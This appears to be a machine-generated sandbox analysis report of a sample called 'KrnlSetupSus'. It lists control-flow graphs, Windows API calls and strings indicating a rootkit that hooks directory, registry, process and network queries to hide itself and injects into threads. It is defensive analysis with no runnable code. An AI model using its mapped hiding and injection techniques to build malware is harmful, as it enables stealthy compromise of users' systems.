1c563f56 VirtualQuery 15161->15162 15163 1c563f70 15161->15163 15164 1c563f8a VirtualAlloc 15161->15164 15162->15161 15162->15163 15163->15153 15164->15163 15165 1c563fbb GetLastError 15164->15165 15165->15161 15165->15163 15169 1c564028 _invalid_parameter_noinfo 15166->15169 15167 1c564097 15167->15148 15168 1c56407d VirtualQuery 15168->15167 15168->15169 15169->15167 15169->15168 15170 1c5640e2 GetLastError 15169->15170 15170->15167 15170->15169 15172 1c56772b 15171->15172 15173 1c567741 SetLastError 15172->15173 15174 1c56774f 15172->15174 15173->15174 15174->15136 14430 1c568432 14433 1c568e80 14430->14433 14432 1c56845d 14434 1c568ed6 14433->14434 14435 1c568ea1 14433->14435 14434->14432 14435->14434 14437 1c56c0e8 14435->14437 14438 1c56c0f5 14437->14438 14439 1c56c0ff 14437->14439 14438->14439 14444 1c56c11a 14438->14444 14440 1c56cfb4 __free_lconv_num 13 API calls 14439->14440 14441 1c56c106 14440->14441 14442 1c56ce0c _invalid_parameter_noinfo 38 API calls 14441->14442 
14443 1c56c112 14442->14443 14443->14434 14444->14443 14445 1c56cfb4 __free_lconv_num 13 API calls 14444->14445 14445->14441 13628 1c56f130 VirtualProtect 14768 1c56f630 14769 1c56f660 14768->14769 14771 1c56f687 14768->14771 14770 1c56c8d0 __free_lconv_num 13 API calls 14769->14770 14769->14771 14776 1c56f674 14769->14776 14770->14776 14772 1c56f75c 14771->14772 14791 1c56c318 EnterCriticalSection 14771->14791 14775 1c56f873 14772->14775 14778 1c56f7c3 14772->14778 14784 1c56f78a 14772->14784 14773 1c56f6c4 14779 1c56f880 14775->14779 14793 1c56c36c LeaveCriticalSection 14775->14793 14776->14771 14776->14773 14777 1c56f709 14776->14777 14780 1c56cfb4 __free_lconv_num 13 API calls 14777->14780 14788 1c56f821 14778->14788 14792 1c56c36c LeaveCriticalSection 14778->14792 14783 1c56f70e 14780->14783 14785 1c56ce0c _invalid_parameter_noinfo 38 API calls 14783->14785 14784->14778 14786 1c56c870 _invalid_parameter_noinfo 14 API calls 14784->14786 14785->14773 14787 1c56f7b3 14786->14787 14789 1c56c870 _invalid_parameter_noinfo 14 API calls 14787->14789 14790 1c56c870 14 API calls _invalid_parameter_noinfo 14788->14790 14789->14778 14790->14788 13669 7ffb4adfbe21 13670 7ffb4adfbe27 SetWindowsHookExW 13669->13670 13672 7ffb4adfbff1 13670->13672 14675 1c56c9bc 14680 1c56f160 14675->14680 14677 1c56c9c5 14678 1c56c8d0 __free_lconv_num 13 API calls 14677->14678 14679 1c56c9e2 __vcrt_uninitialize_ptd 14677->14679 14678->14679 14681 1c56f175 14680->14681 14682 1c56f171 14680->14682 14681->14682 14683 1c56ed48 9 API calls 14681->14683 14682->14677 14683->14682 14794 1c57363c 14795 1c573674 __GSHandlerCheckCommon 14794->14795 14796 1c5736a0 14795->14796 14798 1c5697e4 14795->14798 14799 1c5690e4 __CxxCallCatchBlock 9 API calls 14798->14799 14800 1c56980e 14799->14800 14801 1c5690e4 __CxxCallCatchBlock 9 API calls 14800->14801 14802 1c56981b 14801->14802 14803 1c5690e4 __CxxCallCatchBlock 9 API calls 14802->14803 14804 1c569824 14803->14804 14804->14796 13673 1c563fb9 13674 
1c563f06 _invalid_parameter_noinfo 13673->13674 13675 1c563f56 VirtualQuery 13674->13675 13676 1c563f8a VirtualAlloc 13674->13676 13677 1c563f70 13674->13677 13675->13674 13675->13677 13676->13677 13678 1c563fbb GetLastError 13676->13678 13678->13674 13678->13677 14684 1c565db9 14685 1c565dc0 VirtualProtect 14684->14685 14686 1c565de9 GetLastError 14685->14686 14687 1c565cd0 14685->14687 14686->14687 14688 1c56f1a4 14689 1c56f1dd 14688->14689 14691 1c56f1ae 14688->14691 14690 1c56f1c3 FreeLibrary 14690->14691 14691->14689 14691->14690 14692 1c5731a4 14693 1c5731b5 CloseHandle 14692->14693 14694 1c5731bb 14692->14694 14693->14694 14695 1c5661a3 14696 1c5661b0 14695->14696 14697 1c5661bc GetThreadContext 14696->14697 14704 1c56631a 14696->14704 14698 1c5661e2 14697->14698 14697->14704 14703 1c566209 14698->14703 14698->14704 14699 1c566341 VirtualProtect FlushInstructionCache 14699->14704 14700 1c5663fe 14701 1c56641e 14700->14701 14705 1c5648e0 VirtualFree 14700->14705 14702 1c5652f0 3 API calls 14701->14702 14710 1c566423 14702->14710 14706 1c56628d 14703->14706 14707 1c566266 SetThreadContext 14703->14707 14704->14699 14704->14700 14705->14701 14707->14706 14708 1c566477 14711 1c567e30 _invalid_parameter_noinfo 8 API calls 14708->14711 14709 1c566437 ResumeThread 14709->14710 14710->14708 14710->14709 14712 1c5664bf 14711->14712 13679 1c562aa0 NtEnumerateKey 13680 1c562b4c 13679->13680 13682 1c562aec 13679->13682 13681 1c562afe NtEnumerateKey 13681->13682 13682->13680 13682->13681 13683 1c563d4c StrCmpNIW 13682->13683 13683->13682 14596 1c567d20 14597 1c567d41 14596->14597 14598 1c567d3c 14596->14598 14600 1c567e50 14598->14600 14601 1c567ee7 14600->14601 14602 1c567e73 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 14600->14602 14601->14597 14602->14601 14518 1c5704a0 14519 1c5704b9 14518->14519 14520 1c5704a9 14518->14520 14521 1c56cfb4 __free_lconv_num 13 API calls 14520->14521 14522 1c5704ae 14521->14522 14523 1c56ce0c 
_invalid_parameter_noinfo 38 API calls 14522->14523 14523->14519 15175 1c573720 15185 1c568a60 15175->15185 15177 1c573748 15179 1c5690e4 __CxxCallCatchBlock 9 API calls 15180 1c573758 15179->15180 15181 1c5690e4 __CxxCallCatchBlock 9 API calls 15180->15181 15182 1c573761 15181->15182 15183 1c56c0b4 14 API calls 15182->15183 15184 1c57376a 15183->15184 15187 1c568a90 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 15185->15187 15186 1c568b91 15186->15177 15186->15179 15187->15186 15188 1c568b54 RtlUnwindEx 15187->15188 15188->15187 13684 1c56242c GetProcessIdOfThread GetCurrentProcessId 13685 1c562457 CreateFileW 13684->13685 13686 1c5624d2 NtResumeThread 13684->13686 13685->13686 13687 1c56248b WriteFile ReadFile CloseHandle 13685->13687 13687->13686 14713 1c56b5aa 14714 1c56c0b4 14 API calls 14713->14714 14715 1c56b5af 14714->14715 14716 1c56b5d5 GetModuleHandleW 14715->14716 14717 1c56b61f 14715->14717 14716->14717 14721 1c56b5e2 14716->14721 14730 1c56b4b8 14717->14730 14721->14717 14725 1c56b6c4 GetModuleHandleExW 14721->14725 14726 1c56b6f8 GetProcAddress 14725->14726 14727 1c56b70a 14725->14727 14726->14727 14728 1c56b722 14727->14728 14729 1c56b71b FreeLibrary 14727->14729 14728->14717 14729->14728 14742 1c56c318 EnterCriticalSection 14730->14742

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 51 1c562dd0-1c562e49 NtDeviceIoControlFile 52 1c563154-1c563177 51->52 53 1c562e4f-1c562e55 51->53 53->52 54 1c562e5b-1c562e5e 53->54 54->52 55 1c562e64-1c562e67 54->55 55->52 56 1c562e6d-1c562e7d GetModuleHandleA 55->56 57 1c562e91 56->57 58 1c562e7f-1c562e8f GetProcAddress 56->58 59 1c562e94-1c562eb2 57->59 58->59 59->52 61 1c562eb8-1c562ed7 StrCmpNIW 59->61 61->52 62 1c562edd-1c562ee1 61->62 62->52 63 1c562ee7-1c562ef1 62->63 63->52 64 1c562ef7-1c562efe 63->64 64->52 65 1c562f04-1c562f17 64->65 66 1c562f27 65->66 67 1c562f19-1c562f25 65->67 68 1c562f2a-1c562f2e 66->68 67->68 69 1c562f30-1c562f3c 68->69 70 1c562f3e 68->70 71 1c562f41-1c562f4b 69->71 70->71 72 1c563031-1c563035 71->72 73 1c562f51-1c562f54 71->73 76 1c563146-1c56314e 72->76 77 1c56303b-1c56303e 72->77 74 1c562f66-1c562f70 73->74 75 1c562f56-1c562f63 call 1c561a30 73->75 79 1c562fa4-1c562fae 74->79 80 1c562f72-1c562f7f 74->80 75->74 76->52 76->65 81 1c563040-1c56304c call 1c561a30 77->81 82 1c56304f-1c563059 77->82 87 1c562fb0-1c562fbd 79->87 88 1c562fde-1c562fe1 79->88 80->79 86 1c562f81-1c562f8e 80->86 81->82 83 1c56305b-1c563068 82->83 84 1c563089-1c56308c 82->84 83->84 90 1c56306a-1c563077 83->90 91 1c56308e-1c563097 call 1c561cc0 84->91 92 1c563099-1c5630a6 lstrlenW 84->92 93 1c562f91-1c562f97 86->93 87->88 94 1c562fbf-1c562fcc 87->94 96 1c562fe3-1c562fed call 1c561cc0 88->96 97 1c562fef-1c562ffc lstrlenW 88->97 99 1c56307a-1c563080 90->99 91->92 110 1c5630ca-1c5630d5 91->110 105 1c5630a8-1c5630b7 call 1c561cf8 92->105 106 1c5630b9-1c5630c3 call 1c563d4c 92->106 103 1c563027-1c56302c 93->103 104 1c562f9d-1c562fa2 93->104 107 1c562fcf-1c562fd5 94->107 96->97 96->103 100 1c562ffe-1c56300d call 1c561cf8 97->100 101 1c56300f-1c563021 call 1c563d4c 97->101 109 1c563082-1c563087 99->109 99->110 100->101 100->103 101->103 114 1c5630c6-1c5630c8 101->114 
103->114 104->79 104->93 105->106 105->110 106->114 107->103 117 1c562fd7-1c562fdc 107->117 109->84 109->99 118 1c5630d7-1c5630f7 call 1c573800 110->118 119 1c563140-1c563144 110->119 114->76 114->110 117->88 117->107 126 1c56311a-1c56311d 118->126 127 1c5630f9-1c563117 call 1c573800 118->127 119->76 126->119 129 1c56311f-1c56313d call 1c573800 126->129 127->126 129->119
                                                                                                                                  APIs
                                                                                                                                  • NtDeviceIoControlFile.NTDLL ref: 1C562E3B
                                                                                                                                  • GetModuleHandleA.KERNEL32 ref: 1C562E74
                                                                                                                                  • lstrlenW.KERNEL32 ref: 1C56309E
                                                                                                                                    • Part of subcall function 1C561A30: OpenProcess.KERNEL32 ref: 1C561A56
                                                                                                                                    • Part of subcall function 1C561A30: K32GetProcessImageFileNameW.KERNEL32 ref: 1C561A72
                                                                                                                                    • Part of subcall function 1C561A30: PathFindFileNameW.SHLWAPI ref: 1C561A81
                                                                                                                                    • Part of subcall function 1C561A30: lstrlenW.KERNEL32 ref: 1C561A8D
                                                                                                                                    • Part of subcall function 1C561A30: StrCpyW.SHLWAPI ref: 1C561AA0
                                                                                                                                    • Part of subcall function 1C561A30: CloseHandle.KERNEL32 ref: 1C561AAE
                                                                                                                                  • GetProcAddress.KERNEL32 ref: 1C562E89
                                                                                                                                    • Part of subcall function 1C563D4C: StrCmpNIW.SHLWAPI(?,?,?,1C562722), ref: 1C563D64
                                                                                                                                  • StrCmpNIW.SHLWAPI ref: 1C562ECC
                                                                                                                                  • lstrlenW.KERNEL32 ref: 1C562FF4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Filelstrlen$HandleNameProcess$AddressCloseControlDeviceFindImageModuleOpenPathProc
                                                                                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                  • API String ID: 1066285882-3850299575
                                                                                                                                  • Opcode ID: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
                                                                                                                                  • Instruction ID: 0f0b9c6f4b36b640b45cc234adc9ea0da301c2eb6402e5cc7b848dd40ea7aa52
                                                                                                                                  • Opcode Fuzzy Hash: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
                                                                                                                                  • Instruction Fuzzy Hash: CB91E2B6321BA086EB18CF26D9407AAB3A5FB84FD4F505116EE4993F15EF34D888C350

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ProcessThread$CloseCreateCurrentHandleReadResumeWrite
                                                                                                                                  • String ID: \\.\pipe\$77childproc
                                                                                                                                  • API String ID: 422971377-421986751
                                                                                                                                  • Opcode ID: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction ID: 12cc51de5d1dfd52c73b207ef139dc5263c67817de64dc053f0f2804392ef173
                                                                                                                                  • Opcode Fuzzy Hash: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction Fuzzy Hash: 80112E72614B9082F710CB21F458B9A7761F789BE5F904215EA9A06BA8DF7CD1D8CB40

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 137 1c563398-1c5633ed GetProcessHeap HeapAlloc NtQuerySystemInformation 138 1c5633f3-1c5633f6 137->138 139 1c5634a9-1c5634d7 GetProcessHeap RtlFreeHeap 137->139 140 1c5633fb-1c5633fe 138->140 141 1c5633f8 138->141 142 1c563403-1c563406 140->142 143 1c563400 140->143 141->140 144 1c56340b-1c563411 142->144 145 1c563408 142->145 143->142 146 1c563417-1c563422 144->146 147 1c5634a4 144->147 145->144 148 1c563424-1c563434 146->148 149 1c56344d-1c563457 call 1c561cc0 146->149 147->139 148->149 150 1c563436-1c56344b StrCmpNIW 148->150 152 1c563471-1c563474 149->152 154 1c563459-1c56346f call 1c561d2c 149->154 150->149 150->152 155 1c563476-1c56347a 152->155 156 1c56347d-1c563480 152->156 154->152 160 1c563495-1c563497 154->160 155->156 157 1c563482-1c563486 156->157 158 1c563489-1c56348c 156->158 157->158 158->160 161 1c56348e-1c563492 158->161 160->147 163 1c563499-1c56349e 160->163 161->160 163->146 163->147
                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,1C5623E5), ref: 1C5633BB
                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,?,?,1C5623E5), ref: 1C5633CE
                                                                                                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?,?,1C5623E5), ref: 1C5633E5
                                                                                                                                  • StrCmpNIW.SHLWAPI(?,?,?,?,?,1C5623E5), ref: 1C563443
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,1C5623E5), ref: 1C5634A9
                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,?,?,1C5623E5), ref: 1C5634B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                                                                                                  • String ID: $77
                                                                                                                                  • API String ID: 722747020-3904844309
                                                                                                                                  • Opcode ID: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction ID: 0d452623d3647760d936ad28f137b2ec0115eeb4410f0a3b23c9b84e4e11aded
                                                                                                                                  • Opcode Fuzzy Hash: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction Fuzzy Hash: 43316B32702BA182EB02CF66E94876AB761FB84F95F548024CF8847F16EF38D0A58310

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 334 1c5624f0-1c562580 NtQueryDirectoryFile 335 1c562586-1c562589 334->335 336 1c5627ae-1c5627d1 334->336 335->336 337 1c56258f-1c56259d 335->337 337->336 338 1c5625a3-1c5625e9 call 1c573ea0 * 3 GetFileType 337->338 345 1c562601-1c56260b call 1c561ad0 338->345 346 1c5625eb-1c5625ff StrCpyW 338->346 347 1c562610-1c562613 345->347 346->347 349 1c56270b-1c562724 call 1c56353c call 1c563d4c 347->349 350 1c562619-1c56261e 347->350 363 1c562726-1c562755 call 1c56353c call 1c5634d8 call 1c561dd0 349->363 364 1c5626b0-1c562705 349->364 352 1c562621-1c562626 350->352 354 1c562643 352->354 355 1c562628-1c56262b 352->355 356 1c562646-1c56265f call 1c56353c call 1c563d4c 354->356 355->354 358 1c56262d-1c562630 355->358 372 1c562665-1c562694 call 1c56353c call 1c5634d8 call 1c561dd0 356->372 373 1c56275d-1c56275f 356->373 358->354 361 1c562632-1c562635 358->361 361->354 365 1c562637-1c56263a 361->365 363->364 389 1c56275b 363->389 364->336 364->349 365->354 366 1c56263c-1c562641 365->366 366->354 366->356 372->373 395 1c56269a-1c5626a5 372->395 375 1c562780-1c562783 373->375 376 1c562761-1c56277b 373->376 379 1c562785-1c56278b 375->379 380 1c56278d-1c562790 375->380 376->352 379->336 383 1c562792-1c562795 380->383 384 1c5627ab 380->384 383->384 387 1c562797-1c56279a 383->387 384->336 387->384 390 1c56279c-1c56279f 387->390 389->336 390->384 392 1c5627a1-1c5627a4 390->392 392->384 394 1c5627a6-1c5627a9 392->394 394->336 394->384 395->352 396 1c5626ab 395->396 396->336
                                                                                                                                  APIs
                                                                                                                                  • NtQueryDirectoryFile.NTDLL ref: 1C562575
                                                                                                                                  • GetFileType.KERNEL32 ref: 1C5625E0
                                                                                                                                  • StrCpyW.SHLWAPI ref: 1C5625F9
                                                                                                                                    • Part of subcall function 1C563D4C: StrCmpNIW.SHLWAPI(?,?,?,1C562722), ref: 1C563D64
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$DirectoryQueryType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 4175507832-91387939
                                                                                                                                  • Opcode ID: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction ID: 2c2088d032d0eaf900fef1c42de7edd1ba118ab98cff3ece92a6e8160d7ff6d1
                                                                                                                                  • Opcode Fuzzy Hash: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction Fuzzy Hash: 2761BB3A604BE286D721CF36AC507EAAB65F3C9BD4F900126DE4A97F19DE34D245C720

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 397 1c5627d4-1c562858 NtQueryDirectoryFileEx 398 1c56285e-1c562861 397->398 399 1c562a7c-1c562a9f 397->399 398->399 400 1c562867-1c562875 398->400 400->399 401 1c56287b-1c5628c1 call 1c573ea0 * 3 GetFileType 400->401 408 1c5628c3-1c5628d7 StrCpyW 401->408 409 1c5628d9-1c5628e3 call 1c561ad0 401->409 410 1c5628e8-1c5628ec 408->410 409->410 412 1c5628f2-1c5628f7 410->412 413 1c5629d9-1c5629f2 call 1c56353c call 1c563d4c 410->413 414 1c5628fa-1c5628ff 412->414 427 1c5629f4-1c562a23 call 1c56353c call 1c5634d8 call 1c561dd0 413->427 428 1c562989-1c5629d3 413->428 416 1c562901-1c562904 414->416 417 1c56291c 414->417 416->417 419 1c562906-1c562909 416->419 420 1c56291f-1c562938 call 1c56353c call 1c563d4c 417->420 419->417 422 1c56290b-1c56290e 419->422 436 1c56293e-1c56296d call 1c56353c call 1c5634d8 call 1c561dd0 420->436 437 1c562a2b-1c562a2d 420->437 422->417 425 1c562910-1c562913 422->425 425->417 429 1c562915-1c56291a 425->429 427->428 451 1c562a29 427->451 428->399 428->413 429->417 429->420 436->437 457 1c562973-1c56297e 436->457 439 1c562a4e-1c562a51 437->439 440 1c562a2f-1c562a49 437->440 443 1c562a53-1c562a59 439->443 444 1c562a5b-1c562a5e 439->444 440->414 443->399 447 1c562a60-1c562a63 444->447 448 1c562a79 444->448 447->448 452 1c562a65-1c562a68 447->452 448->399 451->399 452->448 454 1c562a6a-1c562a6d 452->454 454->448 456 1c562a6f-1c562a72 454->456 456->448 458 1c562a74-1c562a77 456->458 457->414 459 1c562984 457->459 458->399 458->448 459->399
                                                                                                                                  APIs
                                                                                                                                  • NtQueryDirectoryFileEx.NTDLL ref: 1C56284D
                                                                                                                                  • GetFileType.KERNEL32 ref: 1C5628B8
                                                                                                                                  • StrCpyW.SHLWAPI ref: 1C5628D1
                                                                                                                                    • Part of subcall function 1C563D4C: StrCmpNIW.SHLWAPI(?,?,?,1C562722), ref: 1C563D64
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$DirectoryQueryType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 4175507832-91387939

Control-flow Graph
APIs
• NtQuerySystemInformation.NTDLL ref: 1C56223F
• StrCmpNIW.SHLWAPI ref: 1C5622AE
  • Part of subcall function 1C563398: GetProcessHeap.KERNEL32(?,?,?,?,?,1C5623E5), ref: 1C5633BB
  • Part of subcall function 1C563398: HeapAlloc.KERNEL32(?,?,?,?,?,1C5623E5), ref: 1C5633CE
  • Part of subcall function 1C563398: NtQuerySystemInformation.NTDLL(?,?,?,?,?,1C5623E5), ref: 1C5633E5
  • Part of subcall function 1C563398: StrCmpNIW.SHLWAPI(?,?,?,?,?,1C5623E5), ref: 1C563443
  • Part of subcall function 1C563398: GetProcessHeap.KERNEL32(?,?,?,?,?,1C5623E5), ref: 1C5634A9
  • Part of subcall function 1C563398: RtlFreeHeap.NTDLL(?,?,?,?,?,1C5623E5), ref: 1C5634B7
Strings
Memory Dump Source
• Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
Similarity
• API ID: Heap$InformationProcessQuerySystem$AllocFree
• String ID: $77$S
• API String ID: 1443098332-3174149180

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
Similarity
• API ID:
• String ID: B$CAN_^
• API String ID: 0-2068767752
APIs
Memory Dump Source
• Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
Similarity
• API ID: Enumerate
• String ID:
• API String ID: 304946047-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
Similarity
• API ID: EnumerateValue
• String ID:
• API String ID: 1749906896-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
Similarity
• API ID:
• String ID: CAN_^
• API String ID: 0-3098826533
APIs
Memory Dump Source
• Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
Memory Dump Source
• Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56172F
                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56173E
